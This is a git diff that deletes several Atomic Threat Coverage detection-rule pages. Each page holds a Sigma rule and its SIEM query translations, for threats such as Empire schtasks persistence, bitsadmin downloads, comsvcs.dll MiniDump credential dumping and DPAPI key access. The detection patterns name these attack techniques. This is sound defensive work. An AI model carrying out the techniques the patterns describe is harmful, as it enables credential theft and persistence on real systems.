-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "ParentImage.*.*\\powershell.exe") -and ($_.message -match "CommandLine.*.*schtasks.*/Create.*/SC .*ONLOGON.*/TN .*Updater.*/TR .*powershell.*" -or $_.message -match "CommandLine.*.*schtasks.*/Create.*/SC .*DAILY.*/TN .*Updater.*/TR .*powershell.*" -or $_.message -match "CommandLine.*.*schtasks.*/Create.*/SC .*ONIDLE.*/TN .*Updater.*/TR .*powershell.*" -or $_.message -match "CommandLine.*.*schtasks.*/Create.*/SC .*Updater.*/TN .*Updater.*/TR .*powershell.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentImage.keyword:(*\\powershell.exe) AND winlog.event_data.CommandLine.keyword:(*schtasks*\/Create*\/SC\ *ONLOGON*\/TN\ *Updater*\/TR\ *powershell* OR *schtasks*\/Create*\/SC\ *DAILY*\/TN\ *Updater*\/TR\ *powershell* OR *schtasks*\/Create*\/SC\ *ONIDLE*\/TN\ *Updater*\/TR\ *powershell* OR *schtasks*\/Create*\/SC\ *Updater*\/TN\ *Updater*\/TR\ *powershell*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/56c217c3-2de2-479b-990f-5c109ba8458f <<EOF
-{
-  "metadata": {
-    "title": "Default PowerSploit and Empire Schtasks Persistence",
-    "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.",
-    "tags": [
-      "attack.execution",
-      "attack.persistence",
-      "attack.privilege_escalation",
-      "attack.t1053",
-      "attack.t1086",
-      "attack.s0111",
-      "attack.g0022",
-      "attack.g0060",
-      "car.2013-08-001",
-      "attack.t1053.005",
-      "attack.t1059.001"
-    ],
-    "query": "(winlog.event_data.ParentImage.keyword:(*\\\\powershell.exe) AND winlog.event_data.CommandLine.keyword:(*schtasks*\\/Create*\\/SC\\ *ONLOGON*\\/TN\\ *Updater*\\/TR\\ *powershell* OR *schtasks*\\/Create*\\/SC\\ *DAILY*\\/TN\\ *Updater*\\/TR\\ *powershell* OR *schtasks*\\/Create*\\/SC\\ *ONIDLE*\\/TN\\ *Updater*\\/TR\\ *powershell* OR *schtasks*\\/Create*\\/SC\\ *Updater*\\/TN\\ *Updater*\\/TR\\ *powershell*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ParentImage.keyword:(*\\\\powershell.exe) AND winlog.event_data.CommandLine.keyword:(*schtasks*\\/Create*\\/SC\\ *ONLOGON*\\/TN\\ *Updater*\\/TR\\ *powershell* OR *schtasks*\\/Create*\\/SC\\ *DAILY*\\/TN\\ *Updater*\\/TR\\ *powershell* OR *schtasks*\\/Create*\\/SC\\ *ONIDLE*\\/TN\\ *Updater*\\/TR\\ *powershell* OR *schtasks*\\/Create*\\/SC\\ *Updater*\\/TN\\ *Updater*\\/TR\\ *powershell*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Default PowerSploit and Empire Schtasks Persistence'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentImage.keyword:(*\\powershell.exe) AND CommandLine.keyword:(*schtasks*\/Create*\/SC *ONLOGON*\/TN *Updater*\/TR *powershell* *schtasks*\/Create*\/SC *DAILY*\/TN *Updater*\/TR *powershell* *schtasks*\/Create*\/SC *ONIDLE*\/TN *Updater*\/TR *powershell* *schtasks*\/Create*\/SC *Updater*\/TN *Updater*\/TR *powershell*))
-```
-
-
-### splunk
-    
-```
-((ParentImage="*\\powershell.exe") (CommandLine="*schtasks*/Create*/SC *ONLOGON*/TN *Updater*/TR *powershell*" OR CommandLine="*schtasks*/Create*/SC *DAILY*/TN *Updater*/TR *powershell*" OR CommandLine="*schtasks*/Create*/SC *ONIDLE*/TN *Updater*/TR *powershell*" OR CommandLine="*schtasks*/Create*/SC *Updater*/TN *Updater*/TR *powershell*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage IN ["*\\powershell.exe"] CommandLine IN ["*schtasks*/Create*/SC *ONLOGON*/TN *Updater*/TR *powershell*", "*schtasks*/Create*/SC *DAILY*/TN *Updater*/TR *powershell*", "*schtasks*/Create*/SC *ONIDLE*/TN *Updater*/TR *powershell*", "*schtasks*/Create*/SC *Updater*/TN *Updater*/TR *powershell*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*\powershell\.exe))(?=.*(?:.*.*schtasks.*/Create.*/SC .*ONLOGON.*/TN .*Updater.*/TR .*powershell.*|.*.*schtasks.*/Create.*/SC .*DAILY.*/TN .*Updater.*/TR .*powershell.*|.*.*schtasks.*/Create.*/SC .*ONIDLE.*/TN .*Updater.*/TR .*powershell.*|.*.*schtasks.*/Create.*/SC .*Updater.*/TN .*Updater.*/TR .*powershell.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_proc_wrong_parent.md b/Atomic_Threat_Coverage/Detection_Rules/win_proc_wrong_parent.md
deleted file mode 100644
index 6beeeaa..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_proc_wrong_parent.md
+++ /dev/null
@@ -1,193 +0,0 @@
-| Title                    | Windows Processes Suspicious Parent Directory       |
-|:-------------------------|:------------------|
-| **Description**          | Detect suspicious parent processes of well-known Windows processes |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1036: Masquerading](https://attack.mitre.org/techniques/T1036)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Some security products seem to spawn these</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2](https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2)</li><li>[https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/](https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/)</li><li>[https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf](https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf)</li><li>[https://attack.mitre.org/techniques/T1036/](https://attack.mitre.org/techniques/T1036/)</li></ul>  |
-| **Author**               | vburov |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Windows Processes Suspicious Parent Directory
-id: 96036718-71cc-4027-a538-d1587e0006a7
-status: experimental
-description: Detect suspicious parent processes of well-known Windows processes
-author: vburov
-references:
-    - https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2
-    - https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/
-    - https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf
-    - https://attack.mitre.org/techniques/T1036/
-date: 2019/02/23
-modified: 2019/08/20
-tags:
-    - attack.defense_evasion
-    - attack.t1036
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image:
-            - '*\svchost.exe'
-            - '*\taskhost.exe'
-            - '*\lsm.exe'
-            - '*\lsass.exe'
-            - '*\services.exe'
-            - '*\lsaiso.exe'
-            - '*\csrss.exe'
-            - '*\wininit.exe'
-            - '*\winlogon.exe'
-    filter:
-        ParentImage:
-            - '*\System32\\*'
-            - '*\SysWOW64\\*'
-            - '*\SavService.exe'
-            - '*\Windows Defender\\*\MsMpEng.exe'
-    filter_null:
-        ParentImage: null
-    condition: selection and not filter and not filter_null
-falsepositives:
-    - Some security products seem to spawn these
-level: low
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and (($_.message -match "Image.*.*\\svchost.exe" -or $_.message -match "Image.*.*\\taskhost.exe" -or $_.message -match "Image.*.*\\lsm.exe" -or $_.message -match "Image.*.*\\lsass.exe" -or $_.message -match "Image.*.*\\services.exe" -or $_.message -match "Image.*.*\\lsaiso.exe" -or $_.message -match "Image.*.*\\csrss.exe" -or $_.message -match "Image.*.*\\wininit.exe" -or $_.message -match "Image.*.*\\winlogon.exe") -and  -not (($_.message -match "ParentImage.*.*\\System32\\.*" -or $_.message -match "ParentImage.*.*\\SysWOW64\\.*" -or $_.message -match "ParentImage.*.*\\SavService.exe" -or $_.message -match "ParentImage.*.*\\Windows Defender\\.*\\MsMpEng.exe"))) -and  -not (-not ParentImage="*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:(*\\svchost.exe OR *\\taskhost.exe OR *\\lsm.exe OR *\\lsass.exe OR *\\services.exe OR *\\lsaiso.exe OR *\\csrss.exe OR *\\wininit.exe OR *\\winlogon.exe) AND (NOT (winlog.event_data.ParentImage.keyword:(*\\System32\\* OR *\\SysWOW64\\* OR *\\SavService.exe OR *\\Windows\ Defender\\*\\MsMpEng.exe)))) AND (NOT (NOT _exists_:winlog.event_data.ParentImage)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/96036718-71cc-4027-a538-d1587e0006a7 <<EOF
-{
-  "metadata": {
-    "title": "Windows Processes Suspicious Parent Directory",
-    "description": "Detect suspicious parent processes of well-known Windows processes",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1036"
-    ],
-    "query": "((winlog.event_data.Image.keyword:(*\\\\svchost.exe OR *\\\\taskhost.exe OR *\\\\lsm.exe OR *\\\\lsass.exe OR *\\\\services.exe OR *\\\\lsaiso.exe OR *\\\\csrss.exe OR *\\\\wininit.exe OR *\\\\winlogon.exe) AND (NOT (winlog.event_data.ParentImage.keyword:(*\\\\System32\\\\* OR *\\\\SysWOW64\\\\* OR *\\\\SavService.exe OR *\\\\Windows\\ Defender\\\\*\\\\MsMpEng.exe)))) AND (NOT (NOT _exists_:winlog.event_data.ParentImage)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:(*\\\\svchost.exe OR *\\\\taskhost.exe OR *\\\\lsm.exe OR *\\\\lsass.exe OR *\\\\services.exe OR *\\\\lsaiso.exe OR *\\\\csrss.exe OR *\\\\wininit.exe OR *\\\\winlogon.exe) AND (NOT (winlog.event_data.ParentImage.keyword:(*\\\\System32\\\\* OR *\\\\SysWOW64\\\\* OR *\\\\SavService.exe OR *\\\\Windows\\ Defender\\\\*\\\\MsMpEng.exe)))) AND (NOT (NOT _exists_:winlog.event_data.ParentImage)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Windows Processes Suspicious Parent Directory'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:(*\\svchost.exe *\\taskhost.exe *\\lsm.exe *\\lsass.exe *\\services.exe *\\lsaiso.exe *\\csrss.exe *\\wininit.exe *\\winlogon.exe) AND (NOT (ParentImage.keyword:(*\\System32\\* *\\SysWOW64\\* *\\SavService.exe *\\Windows Defender\\*\\MsMpEng.exe)))) AND (NOT (NOT _exists_:ParentImage)))
-```
-
-
-### splunk
-    
-```
-(((Image="*\\svchost.exe" OR Image="*\\taskhost.exe" OR Image="*\\lsm.exe" OR Image="*\\lsass.exe" OR Image="*\\services.exe" OR Image="*\\lsaiso.exe" OR Image="*\\csrss.exe" OR Image="*\\wininit.exe" OR Image="*\\winlogon.exe") NOT ((ParentImage="*\\System32\\*" OR ParentImage="*\\SysWOW64\\*" OR ParentImage="*\\SavService.exe" OR ParentImage="*\\Windows Defender\\*\\MsMpEng.exe"))) NOT (NOT ParentImage="*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (Image IN ["*\\svchost.exe", "*\\taskhost.exe", "*\\lsm.exe", "*\\lsass.exe", "*\\services.exe", "*\\lsaiso.exe", "*\\csrss.exe", "*\\wininit.exe", "*\\winlogon.exe"]  -(ParentImage IN ["*\\System32\\*", "*\\SysWOW64\\*", "*\\SavService.exe", "*\\Windows Defender\\*\\MsMpEng.exe"]))  -(-ParentImage=*))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*(?:.*.*\svchost\.exe|.*.*\taskhost\.exe|.*.*\lsm\.exe|.*.*\lsass\.exe|.*.*\services\.exe|.*.*\lsaiso\.exe|.*.*\csrss\.exe|.*.*\wininit\.exe|.*.*\winlogon\.exe))(?=.*(?!.*(?:.*(?=.*(?:.*.*\System32\\.*|.*.*\SysWOW64\\.*|.*.*\SavService\.exe|.*.*\Windows Defender\\.*\MsMpEng\.exe)))))))(?=.*(?!.*(?:.*(?=.*(?!ParentImage))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_process_creation_bitsadmin_download.md b/Atomic_Threat_Coverage/Detection_Rules/win_process_creation_bitsadmin_download.md
deleted file mode 100644
index 0f91dfb..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_process_creation_bitsadmin_download.md
+++ /dev/null
@@ -1,187 +0,0 @@
-| Title                    | Bitsadmin Download       |
-|:-------------------------|:------------------|
-| **Description**          | Detects usage of bitsadmin downloading a file |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1197: BITS Jobs](https://attack.mitre.org/techniques/T1197)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1197: BITS Jobs](../Triggers/T1197.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Some legitimate apps use this, but limited.</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin](https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin)</li><li>[https://isc.sans.edu/diary/22264](https://isc.sans.edu/diary/22264)</li></ul>  |
-| **Author**               | Michael Haag |
-| Other Tags           | <ul><li>attack.s0190</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Bitsadmin Download
-id: d059842b-6b9d-4ed1-b5c3-5b89143c6ede
-status: experimental
-description: Detects usage of bitsadmin downloading a file
-references:
-    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin
-    - https://isc.sans.edu/diary/22264
-tags:
-    - attack.defense_evasion
-    - attack.persistence
-    - attack.t1197
-    - attack.s0190
-date: 2017/03/09
-modified: 2019/12/06
-author: Michael Haag
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        Image:
-            - '*\bitsadmin.exe'
-        CommandLine:
-            - '* /transfer *'
-    selection2:
-        CommandLine:
-            - '*copy bitsadmin.exe*'
-    condition: selection1 or selection2
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Some legitimate apps use this, but limited.
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and ((($_.message -match "Image.*.*\\bitsadmin.exe") -and ($_.message -match "CommandLine.*.* /transfer .*")) -or ($_.message -match "CommandLine.*.*copy bitsadmin.exe.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:(*\\bitsadmin.exe) AND winlog.event_data.CommandLine.keyword:(*\ \/transfer\ *)) OR winlog.event_data.CommandLine.keyword:(*copy\ bitsadmin.exe*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/d059842b-6b9d-4ed1-b5c3-5b89143c6ede <<EOF
-{
-  "metadata": {
-    "title": "Bitsadmin Download",
-    "description": "Detects usage of bitsadmin downloading a file",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.persistence",
-      "attack.t1197",
-      "attack.s0190"
-    ],
-    "query": "((winlog.event_data.Image.keyword:(*\\\\bitsadmin.exe) AND winlog.event_data.CommandLine.keyword:(*\\ \\/transfer\\ *)) OR winlog.event_data.CommandLine.keyword:(*copy\\ bitsadmin.exe*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:(*\\\\bitsadmin.exe) AND winlog.event_data.CommandLine.keyword:(*\\ \\/transfer\\ *)) OR winlog.event_data.CommandLine.keyword:(*copy\\ bitsadmin.exe*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Bitsadmin Download'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:(*\\bitsadmin.exe) AND CommandLine.keyword:(* \/transfer *)) OR CommandLine.keyword:(*copy bitsadmin.exe*))
-```
-
-
-### splunk
-    
-```
-(((Image="*\\bitsadmin.exe") (CommandLine="* /transfer *")) OR (CommandLine="*copy bitsadmin.exe*")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((Image IN ["*\\bitsadmin.exe"] CommandLine IN ["* /transfer *"]) OR CommandLine IN ["*copy bitsadmin.exe*"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*(?:.*.*\bitsadmin\.exe))(?=.*(?:.*.* /transfer .*)))|.*(?:.*.*copy bitsadmin\.exe.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_process_dump_rundll32_comsvcs.md b/Atomic_Threat_Coverage/Detection_Rules/win_process_dump_rundll32_comsvcs.md
deleted file mode 100644
index e50a58c..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_process_dump_rundll32_comsvcs.md
+++ /dev/null
@@ -1,182 +0,0 @@
-| Title                    | Process Dump via Rundll32 and Comsvcs.dll       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a process memory dump performed via ordinal function 24 in comsvcs.dll |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1036: Masquerading](https://attack.mitre.org/techniques/T1036)</li><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unlikely, because no one should dump the process memory in that way</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/shantanukhande/status/1229348874298388484](https://twitter.com/shantanukhande/status/1229348874298388484)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>car.2013-05-009</li><li>attack.t1003.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Process Dump via Rundll32 and Comsvcs.dll
-id: 646ea171-dded-4578-8a4d-65e9822892e3
-description: Detects a process memory dump performed via ordinal function 24 in comsvcs.dll
-status: experimental
-references:
-    - https://twitter.com/shantanukhande/status/1229348874298388484
-author: Florian Roth
-date: 2020/02/18
-tags:
-    - attack.defense_evasion
-    - attack.t1036
-    - attack.credential_access
-    - attack.t1003
-    - car.2013-05-009
-    - attack.t1003.001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine|contains:
-            - 'comsvcs.dll,#24'
-            - 'comsvcs.dll,MiniDump'
-    condition: selection
-falsepositives:
-    - Unlikely, because no one should dump the process memory in that way
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.*comsvcs.dll,#24.*" -or $_.message -match "CommandLine.*.*comsvcs.dll,MiniDump.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*comsvcs.dll,#24* OR *comsvcs.dll,MiniDump*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/646ea171-dded-4578-8a4d-65e9822892e3 <<EOF
-{
-  "metadata": {
-    "title": "Process Dump via Rundll32 and Comsvcs.dll",
-    "description": "Detects a process memory dump performed via ordinal function 24 in comsvcs.dll",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1036",
-      "attack.credential_access",
-      "attack.t1003",
-      "car.2013-05-009",
-      "attack.t1003.001"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*comsvcs.dll,#24* OR *comsvcs.dll,MiniDump*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*comsvcs.dll,#24* OR *comsvcs.dll,MiniDump*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Process Dump via Rundll32 and Comsvcs.dll'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(*comsvcs.dll,#24* *comsvcs.dll,MiniDump*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="*comsvcs.dll,#24*" OR CommandLine="*comsvcs.dll,MiniDump*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["*comsvcs.dll,#24*", "*comsvcs.dll,MiniDump*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*comsvcs\.dll,#24.*|.*.*comsvcs\.dll,MiniDump.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_protected_storage_service_access.md b/Atomic_Threat_Coverage/Detection_Rules/win_protected_storage_service_access.md
deleted file mode 100644
index 66d7231..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_protected_storage_service_access.md
+++ /dev/null
@@ -1,174 +0,0 @@
-| Title                    | Protected Storage Service Access       |
-|:-------------------------|:------------------|
-| **Description**          | Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1021: Remote Services](https://attack.mitre.org/techniques/T1021)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/06_credential_access/T1003_credential_dumping/domain_dpapi_backupkey_extraction.md](https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/06_credential_access/T1003_credential_dumping/domain_dpapi_backupkey_extraction.md)</li></ul>  |
-| **Author**               | Roberto Rodriguez @Cyb3rWard0g |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Protected Storage Service Access
-id: 45545954-4016-43c6-855e-eae8f1c369dc
-description: Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers
-status: experimental
-date: 2019/08/10
-modified: 2019/11/10
-author: Roberto Rodriguez @Cyb3rWard0g
-references:
-    - https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/06_credential_access/T1003_credential_dumping/domain_dpapi_backupkey_extraction.md
-tags:
-    - attack.lateral_movement
-    - attack.t1021
-logsource:
-    product: windows
-    service: security
-detection:
-    selection: 
-        EventID: 5145
-        ShareName|contains: 'IPC'
-        RelativeTargetName: "protected_storage"
-    condition: selection
-falsepositives:
-    - Unknown
-level: critical
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "5145" -and $_.message -match "ShareName.*.*IPC.*" -and $_.message -match "RelativeTargetName.*protected_storage") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"5145" AND winlog.event_data.ShareName.keyword:*IPC* AND RelativeTargetName:"protected_storage")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/45545954-4016-43c6-855e-eae8f1c369dc <<EOF
-{
-  "metadata": {
-    "title": "Protected Storage Service Access",
-    "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.t1021"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"5145\" AND winlog.event_data.ShareName.keyword:*IPC* AND RelativeTargetName:\"protected_storage\")"
-  },
-  "trigger": {
-    "schedule": {
